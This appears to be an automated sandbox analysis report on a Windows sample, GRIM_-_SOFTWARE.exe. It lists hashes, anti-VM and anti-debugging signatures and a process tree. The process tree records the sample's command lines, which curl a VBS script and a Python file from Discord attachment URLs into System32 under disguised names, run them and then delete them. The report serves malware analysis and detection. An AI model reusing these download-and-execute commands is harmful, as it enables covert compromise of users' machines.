Analysis
-
max time kernel: 122s
max time network: 126s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 25-03-2023 22:51

Behavioral task: behavioral1
Sample: GRIM_-_SOFTWARE.exe
Resource: win7-20230220-en
General
-
Target: GRIM_-_SOFTWARE.exe
Size: 3.8MB
MD5: 6d7e1336a7185a2049c09429cc980b75
SHA1: fd2de69db4416363fb6e34b42e0510256e0e28aa
SHA256: 01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb
SHA512: 88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0
SSDEEP: 98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
  description   ioc                                          process
  Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  GRIM_-_SOFTWARE.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                              process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  GRIM_-_SOFTWARE.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   GRIM_-_SOFTWARE.exe
Processes:
  resource                                                                       yara_rule
  behavioral1/memory/2012-54-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-55-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-56-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-57-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-58-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-89-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-90-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-94-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
  behavioral1/memory/2012-97-0x000000013F020000-0x000000013FA17000-memory.dmp   themida
Checks whether UAC is enabled
Processes:
  description        ioc                                                                                   process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  GRIM_-_SOFTWARE.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
  pid   process
  2012  GRIM_-_SOFTWARE.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
  description                        pid   process              target process
  PID 2012 wrote to memory of 1972   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1972   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1972   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1792   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1792   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1792   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1708   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1708   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1708   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 628    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 628    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 628    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1780   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1780   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1780   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1648   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1648   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1648   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 772    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 772    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 772    2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 772 wrote to memory of 1372    772   cmd.exe              certutil.exe
  PID 772 wrote to memory of 1372    772   cmd.exe              certutil.exe
  PID 772 wrote to memory of 1372    772   cmd.exe              certutil.exe
  PID 772 wrote to memory of 876     772   cmd.exe              find.exe
  PID 772 wrote to memory of 876     772   cmd.exe              find.exe
  PID 772 wrote to memory of 876     772   cmd.exe              find.exe
  PID 772 wrote to memory of 1536    772   cmd.exe              find.exe
  PID 772 wrote to memory of 1536    772   cmd.exe              find.exe
  PID 772 wrote to memory of 1536    772   cmd.exe              find.exe
  PID 2012 wrote to memory of 1368   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1368   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1368   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1432   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1432   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1432   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1860   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1860   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1860   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1896   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1896   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1896   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1400   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1400   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1400   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1944   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1944   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1944   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1952   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1952   2012  GRIM_-_SOFTWARE.exe  cmd.exe
  PID 2012 wrote to memory of 1952   2012  GRIM_-_SOFTWARE.exe  cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe  (level 1)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&1

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\certutil.exe  (level 3)
      cmdline: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5

    C:\Windows\system32\find.exe  (level 3)
      cmdline: find /i /v "md5"

    C:\Windows\system32\find.exe  (level 3)
      cmdline: find /i /v "certutil"

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&1

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp3

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py

  C:\Windows\system32\cmd.exe  (level 2)
    cmdline: C:\Windows\system32\cmd.exe /c cls
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
  memory dump                                                        Filesize
  memory/1708-88-0x0000000001F50000-0x0000000001F51000-memory.dmp   4KB
  memory/2012-54-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-55-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-56-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-57-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-58-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-89-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-90-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-94-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB
  memory/2012-97-0x000000013F020000-0x000000013FA17000-memory.dmp   10.0MB